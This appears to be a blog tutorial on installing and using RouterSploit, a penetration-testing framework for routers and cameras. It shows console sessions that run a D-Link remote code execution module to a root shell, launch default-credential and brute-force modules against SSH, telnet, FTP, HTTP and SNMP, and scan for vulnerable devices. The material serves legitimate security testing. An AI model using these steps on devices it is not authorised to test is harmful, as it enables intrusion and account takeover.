Router Exploitation Framework – RouterSploit

Introduction

The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices. If you want to evaluate the security of some devices (routers, cameras, etc.) and perform pen test, you can use RouterSploit framework.

RouterSploit – Exploitation Framework for Embedded Devices

Some Features:

• It’s coded in Python
• Command line interface
• Docker support
• Modular Tools

Supported platforms:

• Linux (Kali, Debian, Ubuntu, CentOS), macOS/Mac OS X, Raspberry Pi, Windows, and unrooted Android phone also.

If you’re already familiar with Metasploit framework, you’ll find RouterSploit commands easy for use. It comes with various modules for penetration testing (for device scan and exploit):

• exploits – taking advantage of identifying vulnerabilities
• creds –  test credentials against network services
• scanners – check if a target is vulnerable to any exploit
• payloads – generating payloads for various architectures and injection points
• generic – perform generic attacks

RouterSploit Install

Dependencies

• future, requests, paramiko, pysnmp, pycrypto
• bluepy – bluetooth low energy (optional)
• gnureadline (OSX only)

Kali Linux:

apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py

For For Bluetooth Low Energy support, run the following:

apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py

Ubuntu (18.04 / 17.10):

sudo add-apt-repository universe
sudo apt-get install git python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py

For Bluetooth Low Energy support, run the following:

apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py

OSX:

git clone https://www.github.com/threat9/routersploit
cd routersploit
sudo python3 -m pip install -r requirements.txt
python3 rsf.py

Running on Docker

git clone https://www.github.com/threat9/routersploit
cd routersploit
docker build -t routersploit .
docker run -it --rm routersploit

Update:

cd routersploit
git pull

Usage

root@kalidev:~/git/routersploit# ./rsf.py
 ______            _            _____       _       _ _
 | ___ \          | |          /  ___|     | |     (_) |
 | |_/ /___  _   _| |_ ___ _ __\ `--. _ __ | | ___  _| |_
 |    // _ \| | | | __/ _ \ '__|`--. \ '_ \| |/ _ \| | __|
 | |\ \ (_) | |_| | ||  __/ |  /\__/ / |_) | | (_) | | |_
 \_| \_\___/ \__,_|\__\___|_|  \____/| .__/|_|\___/|_|\__|
                                     | |
       Exploitation Framework for    |_|   by Threat9
            Embedded Devices
  
 Codename   : I Knew You Were Trouble
 Version    : 3.3.0
 Homepage   : https://www.threat9.com/ - @threatnine
 Join Slack : routersploit.slack.com

 Join Threat9 Beta Program - https://www.threat9.com/

 Exploits: 128 Scanners: 4 Creds: 165 Generic: 4 Payloads: 32 Encoders: 6

rsf >

Exploits

To preform the Exploitation, just pick the module and set the target:

rsf > use exploits/
exploits/2wire/ exploits/asmax/ exploits/asus/ exploits/cisco/ exploits/dlink/ exploits/fortinet/ exploits/juniper/ exploits/linksys/ exploits/multi/ exploits/netgear/
rsf > use exploits/dlink/dir_300_600_rce
rsf (D-LINK DIR-300 & DIR-600 RCE) >

For completion use tab key.

To display options, type show:

rsf (D-LINK DIR-300 & DIR-600 RCE) > show options

Target options:


   Name       Current settings     Description                                
   ----       ----------------     -----------                                
   target                          Target address e.g. http://192.168.1.1     
   port       80                   Target Port

Use run or exploit command to exploit the target:

rsf (D-LINK DIR-300 & DIR-600 RCE) > run
[+] Target is vulnerable
[*] Invoking command loop...
cmd > whoami
root

To set options:

rsf (D-LINK DIR-300 & DIR-600 RCE) > set target http://192.168.1.1 [+] {'target': 'http://192.168.1.1'}

It’s possible to check if the target is vulnerable to particular exploit:

rsf (D-LINK DIR-300 & DIR-600 RCE) > check
[+] Target is vulnerable

Run show info to display info about exploit.

Creds

Modules located under creds/ directory allow running dictionary attacks against various network services. Supported services:

•  ftp
•  ssh
•  telnet
•  http basic auth
•  http form auth
•  snmp

Every service is divided into two modules:

•  default (e.g. ssh_default) – use one wordlist with default credentials pairs login:password.
•  bruteforce (e.g. ssh_bruteforce) – perform dictionary attacks against specified account or list of accounts. It takes two parameters: login and password.

rsf > use creds/
creds/ftp_bruteforce         creds/http_basic_bruteforce  creds/http_form_bruteforce   creds/snmp_bruteforce        creds/ssh_default            creds/telnet_default         
creds/ftp_default            creds/http_basic_default     creds/http_form_default      creds/ssh_bruteforce         creds/telnet_bruteforce      
rsf > use creds/ssh_default
rsf (SSH Default Creds) >

To display the options and run, use the same commands as for exploit.

Scanners

Scanners allow quickly verify if the target is vulnerable to any exploits. Use the same commands to display/set options, and also to run.

rsf (D-Link Scanner) > run
[+] exploits/dlink/dwr_932_info_disclosure is vulnerable
[-] exploits/dlink/dir_300_320_615_auth_bypass is not vulnerable
[-] exploits/dlink/dsl_2750b_info_disclosure is not vulnerable
[-] exploits/dlink/dns_320l_327l_rce is not vulnerable
[-] exploits/dlink/dir_645_password_disclosure is not vulnerable
[-] exploits/dlink/dir_300_600_615_info_disclosure is not vulnerable
[-] exploits/dlink/dir_300_600_rce is not vulnerable

[+] Device is vulnerable!
- exploits/dlink/dwr_932_info_disclosure

You may be interested to learn more about: PowerShell Downgrade Attack – Magic Unicorn.